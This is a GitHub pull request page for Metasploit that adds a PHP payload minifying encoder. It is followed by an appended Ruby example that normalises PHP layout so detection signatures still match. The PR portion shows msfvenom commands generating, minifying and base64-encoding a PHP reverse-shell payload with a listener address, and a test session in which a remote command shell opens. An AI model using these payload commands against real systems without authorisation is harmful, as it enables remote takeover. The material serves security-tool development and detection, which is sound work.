Add an encoder to minify php payloads #19435

Merged
merged 1 commit into from
Sep 4, 2024

@jvoisin jvoisin commented Sep 1, 2024

```console
$ ./msfvenom --platform php -a php -p php/reverse_php | ./msfvenom -e php/base64 --platform php -a php | php -l
Attempting to read payload from STDIN...
No encoder specified, outputting raw payload
Payload size: 3010 bytes
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 4052 (iteration=0)
php/base64 chosen with final size 4052
Payload size: 4052 bytes

No syntax errors detected in Standard input code
$ ./msfvenom --platform php -a php -p php/reverse_php -e php/minify | ./msfvenom -e php/base64 --platform php -a php | php -l
Attempting to read payload from STDIN...
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/minify
php/minify succeeded with size 2109 (iteration=0)
php/minify chosen with final size 2109
Payload size: 2109 bytes

Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 2839 (iteration=0)
php/base64 chosen with final size 2839
Payload size: 2839 bytes

No syntax errors detected in Standard input code
$
```

@jheysel-r7 jheysel-r7 left a comment

Thanks for the great addition @jvoisin, makes sense, looks good and works without issue!

Testing

Before:

```console
➜  metasploit-framework git:(upstream-master) ✗ bundle exec ./msfvenom --platform php -a php -p php/reverse_php LHOST=172.16.199.1 LPORT=4444 |  bundle exec ./msfvenom -e php/base64 --platform php -a php | php -l
Attempting to read payload from STDIN...
No encoder specified, outputting raw payload
Payload size: 2993 bytes
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 4029 (iteration=0)
php/base64 chosen with final size 4029
Payload size: 4029 bytes

No syntax errors detected in Standard input code
```

After / with new encoder:

```console
➜  metasploit-framework git:(5b94c7e2d4) ✗  bundle exec ./msfvenom --platform php -a php -p php/reverse_php LHOST=172.16.199.1 LPORT=4444 -e php/minify |  bundle exec ./msfvenom -e php/base64 --platform php -a php | php -l
Attempting to read payload from STDIN...
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/minify
php/minify succeeded with size 2078 (iteration=0)
php/minify chosen with final size 2078
Payload size: 2078 bytes

Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 2798 (iteration=0)
php/base64 chosen with final size 2798
Payload size: 2798 bytes

No syntax errors detected in Standard input code
```

Ensuring the payload generated with the new encoder works:

```
msf6 payload(php/reverse_php) > to_handler
[*] Payload Handler Started as Job 1

[*] Started reverse TCP handler on 172.16.199.1:4444
msf6 payload(php/reverse_php) > [*] Command shell session 16 opened (172.16.199.1:4444 -> 172.16.199.1:55241) at 2024-09-04 14:27:53 -0700

msf6 payload(php/reverse_php) > sessions -l

Active sessions
===============

  Id  Name  Type           Information  Connection
  --  ----  ----           -----------  ----------
  16        shell php/php               172.16.199.1:4444 -> 172.16.199.1:55241 (172.16.199.1)

msf6 payload(php/reverse_php) > sessions -i -1
[*] Starting interaction with 16...

id
uid=1000(msfuser) <redacted>
```

@jheysel-r7 jheysel-r7 added enhancement payload rn-payload-enhancement release notes for enhanced payloads labels Sep 4, 2024
@jheysel-r7 jheysel-r7 merged commit 4712bb4 into rapid7:master Sep 4, 2024
40 checks passed
@jheysel-r7

Release Notes

This encoder minifies PHP payloads by removing spaces after keywords and before block openings. It removes comments, empty lines, new lines and leading and trailing spaces.
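
The transformations listed in the release note change only layout, so a detection rule that matches exact spacing sees two different byte strings for the same logic. The following is an added example, not code from this pull request or from Metasploit: it reduces a PHP snippet to a layout-independent form before matching. The sample inputs and the signature are constructed, and heredocs and `?>` inside line comments are not handled.

```ruby
require 'strscan'

COMMENT = %r{//[^\n]*|#(?!\[)[^\n]*|/\*.*?\*/}m   # //, # (but not #[attribute]) and /* */
STRING  = /'(?:\\.|[^'\\])*'|"(?:\\.|[^"\\])*"/m   # quoted literals, kept byte for byte

# Drop comments and whitespace outside string literals. A single space is kept
# only where removing it would fuse two identifier characters (e.g. "else if").
def canonical_php(src)
  s = StringScanner.new(src)
  out = +''
  gap = false
  until s.eos?
    if s.scan(COMMENT) || s.scan(/\s+/)
      gap = true
      next
    end
    tok = s.scan(STRING) || s.getch
    out << ' ' if gap && out.match?(/[\w$]\z/) && tok.match?(/\A[\w$]/)
    out << tok
    gap = false
  end
  out
end

# Constructed inputs: the same logic, once formatted and once minified.
FORMATTED = <<~'PHP'
  /* loader */
  if (isset($blob)) {
      // decode and run
      eval( base64_decode( $blob ) );   # trailing comment
      echo 'done  ok';
  }
PHP
MINIFIED = %q[if(isset($blob)){eval(base64_decode($blob));echo 'done  ok';}]

# Constructed signature, written without any spacing.
SIGNATURE = 'eval(base64_decode('

# Match the signature against the raw source or against its canonical form.
def matches?(src, canonicalise:)
  (canonicalise ? canonical_php(src) : src).include?(SIGNATURE)
end

if $PROGRAM_NAME == __FILE__
  puts canonical_php(FORMATTED)
  puts "raw match on formatted source:       #{matches?(FORMATTED, canonicalise: false)}"
  puts "canonical match on formatted source: #{matches?(FORMATTED, canonicalise: true)}"
end
```

The doubled space inside `'done  ok'` survives because string literals are copied verbatim; only layout outside literals is normalised.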
